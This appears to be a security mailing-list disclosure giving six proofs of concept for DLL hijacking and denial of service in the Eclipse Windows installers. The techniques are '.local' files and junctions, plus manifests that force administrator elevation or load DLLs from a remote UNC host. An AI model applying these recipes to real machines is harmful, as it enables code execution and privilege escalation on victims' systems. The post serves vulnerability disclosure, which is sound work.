Hi @ll, this is a followup to "case 36" (posted as "case 35" by mistake), <http://seclists.org/bugtraq/2016/Jul/82>. Proof of concept #1: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the (empty) files "eclipse-inst-win32.exe.local" and "eclipse-inst-win64.exe.local" in the directory where you saved the downloaded installers: Copy NUL: eclipse-inst-win32.exe.local Copy NUL: eclipse-inst-win64.exe.local 3. Create empty files kernel32.dll, kernelbase.dll, advapi32.dll, msvcrt.dll, ..., version.dll in the directory where you saved the downloaded installers. 4. Execute the downloaded installers. DOSSED! 5. Replace the empty DLLs created in step 3 with (malicious) DLLs of your choice. 6. Execute the downloaded installer which matches the processor architecture of the DLLs placed in step 5. PWNED! Proof of concept #2: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the subdirectories "eclipse-inst-win32.exe.local" and "eclipse-inst-win64.exe.local" in the directory where you saved the downloaded installers. 3. Copy any (malicious) DLL of your choice as kernel32.dll, kernelbase.dll, advapi32.dll, msvcrt.dll, ..., version.dll into the subdirectories created in step 2 (32-bit DLLs into "eclipse-inst-win32.exe.local", 64-bit DLLs into "eclipse-inst-win64.exe.local"). 4. Execute the downloaded installers. DOSSED or PWNED! Proof of concept #3: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the junctions "eclipse-inst-win32.exe.local" and "eclipse-inst-win64.exe.local" in the directory where you saved the downloaded installers: MkLink /J eclipse-inst-win32.exe.local %SystemRoot%\System32 MkLink /J eclipse-inst-win64.exe.local %SystemRoot%\SysWow64 3. Execute the downloaded installers. DOSSED! 4. Create the two junctions to directories with malicious DLLs of your choice if you want to get pwned instead. 5. Execute the downloaded installers. PWNED! Proof of concept #4: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the files "eclipse-inst-win32.exe.manifest" and "eclipse-inst-win64.exe.manifest" with the following contents in the directory where you saved the downloaded installers: --- eclipse-inst-win*.exe.manifest --- <?xml version="1.0" encoding="US-ASCII" standalone="yes"?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> </assembly> --- EOF --- 3. Execute the downloaded installers. DOSSED! Proof of concept #5: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the files "eclipse-inst-win32.exe.manifest" and "eclipse-inst-win64.exe.manifest" with the following contents in the directory where you saved the downloaded installers: --- eclipse-inst-win*.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator"/> </requestedPrivileges> </security> </trustInfo </assembly> --- EOF --- 3. Execute the downloaded installers: Windows "user account control" will prompt for elevation, all hijacked DLLs will be executed with administrative privileges. PWNED! Proof of concept #6: ~~~~~~~~~~~~~~~~~~~~ 1. On a 64-bit edition of Windows download the 32-bit and 64-bit executable installers "eclipse-inst-win32.exe" and "eclipse-inst-win64.exe", save them in an arbitrary directory. 2. Create the files "eclipse-inst-win32.exe.manifest" and "eclipse-inst-win64.exe.manifest" with the following contents in the directory where you saved the downloaded installers: --- eclipse-inst-win32.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <file loadFrom="\\127.0.0.1\ADMIN$\System32\Kernel32.Dll" name="Kernel32.Dll" /> </assembly> --- EOF --- --- eclipse-inst-win64.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <file loadFrom="\\127.0.0.1\ADMIN$\SysWoW64\Kernel32.Dll" name="Kernel32.Dll"/> </assembly> --- EOF --- Optionally add more <file> elements for other DLLs loaded by the installers as you like. 3. Execute the downloaded installers. DOSSED! 4. Replace the UNC pathnames to your own host with UNC paths to any host reachable from your network where you placed some malicious DLLs to get pwned instead. 5. Execute the downloaded installers. PWNED! 6. Add the <trustinfo> element from poc#5 to achieve remote code execution with (user-assisted) escalation of privilege. 7. Execute the downloaded installers. PWNED²! stay tuned Stefan Kanthak
